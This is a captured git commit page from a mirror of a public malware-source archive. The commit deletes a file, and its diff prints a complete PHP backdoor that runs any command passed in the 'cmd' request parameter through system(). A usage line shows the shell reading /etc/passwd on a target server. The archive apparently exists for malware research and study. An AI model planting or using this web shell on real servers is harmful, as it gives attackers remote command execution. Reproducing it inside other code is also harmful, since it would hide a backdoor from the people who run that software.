mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-19 00:28:50 +00:00
Delete Backdoor.PHP.WebShell.z
na
This commit is contained in:
parent
bb46d083d5
commit
4ff6e75e58
@ -1,17 +0,0 @@
|
|||||||
<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->
|
|
||||||
|
|
||||||
<?php
|
|
||||||
|
|
||||||
if(isset($_REQUEST['cmd'])){
|
|
||||||
echo "<pre>";
|
|
||||||
$cmd = ($_REQUEST['cmd']);
|
|
||||||
system($cmd);
|
|
||||||
echo "</pre>";
|
|
||||||
die;
|
|
||||||
}
|
|
||||||
|
|
||||||
?>
|
|
||||||
|
|
||||||
Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
|
|
||||||
|
|
||||||
<!-- http://michaeldaw.org 2006 -->
|
|
Loading…
Reference in New Issue
Block a user